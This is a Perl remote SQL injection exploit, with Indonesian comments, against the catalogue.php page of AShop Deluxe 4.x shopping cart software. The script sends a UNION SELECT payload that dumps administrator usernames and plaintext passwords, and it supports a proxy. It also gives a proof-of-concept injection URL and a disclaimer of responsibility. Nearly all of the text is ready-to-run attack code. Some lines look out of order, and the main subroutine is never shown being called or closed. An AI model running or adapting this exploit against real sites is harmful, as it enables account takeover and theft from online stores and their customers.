#usr/bin/perl use LWP::UserAgent; use HTTP::Cookies; use Getopt::Long; use URI::Escape; #-------------------------------------------------------------------------------------------------------------------------------------------------------- # [x] AShop Deluxe 4.x Remote SQL inJection Exploit # [x] Ditemukan Oleh : n0c0py - a.k.a 5iR. 4b03D # [x] Pada Tanggal : 27 juni 2008 # [x] Vendor : http://www.ashopsoftware.com # [x] Laporkan pada vendor : 28 Juni 2008 - PatCh ada pada veNdoR # [x] Dork : - # [x] Deskripsi : AShop Deluxe shopping cart software automates the processing of # online orders and payments. It is a shopping cart plus an array of # specialized tools to support various types of products and selling styles. # The system automates redundant tasks, organizes data, and simplifies # the daily operations of an online store. #-------------------------------------------------------------------------------------------------------------------------------------------------------- # # ===============================================================================================================# # Konsep => # => http://victim.com/ashop/catalogue.php?cat=-99/**/union/**/select/**/1,0x76756C6E657261626C65/* # => Versi dibawahnya juga memungkinkan memiliki kutu yang sama # => password tidak ter-encode membuat eksploitasi semakin mudah # [Catatan] # n0c0py tidak bertanggung jawab atas penyalahgunaan exploit ini. Greetz: # { k1tk4t, Autonux, keboaja, k0il, G1 } # yogyafree => yadoy666, Xshadow, Jack, odod, ray16, indounderground, shadow angel dan segenap Tim # newhack => fl3xu5, opt1|c, L4in # masyarakat hacking indonesia [ yogyafree.net | newhack.org | mainhack.com | echo.or.id | kecoak-elektronik.net ] # ================================================================================================================# if (@ARGV < 1){ print"\nAshop Deluxe 4.x (catalogue.php)"; print"\nRemote SQL Injection Exploit "; print"\ncoded by n0c0py "; print"\n"; print"\n[!] Penggunaan : perl $0 [Host] [Path] <Options>"; print"\n[!] Contoh : perl $0 /ashop "; print"\n[!] Pilihan :"; print"\n -p [ip:port] Proxy support "; print"\n"; exit; }
print "[+] melakukan eksploitasi...\n";
print "\n[+] Bravo!! :D"; print "\n[+] Eksploitasi Selesai Boss!! :D\n";
sub eksploitasi
{ my $host = $ARGV[0]; my $path = $ARGV[1]; my %options = (); GetOptions(\%options, "p=s"); my $url = "http://".$host.$path."/catalogue.php"; my $sploit = "?cat=-99/**/union/**/select/**/1,concat(0x3a3a3a,username,0x3a3a,password,0x3a3a3a)/**/from/**/user/*"; my $exploit= $url.$sploit; my $ua = LWP::UserAgent->new(); my $res = ""; my $content=""; my $regex = ""; if($options{"p"}) { $ua->proxy('http', "http://".$options{"p"}); } #[------------------------------] # Apakah file eksis? #[------------------------------] $res = $ua->get($url); if(!$res->is_success) { print("[+] Gagal! file tidak ditemukan!\n"); print $res->status_line(); } #[-------------------------] # Eksploitasi #[-------------------------] $res = $ua->get($exploit); $content = $res->content; if ($content =~ /:::(.+):::/) { $regex=$1; ($pengguna,$password)= split('::',$regex); printf " [x]nama admin = $pengguna \n [x]password admin = $password\n"; } else { die "Gagal mengeksploitasi :p \n"; }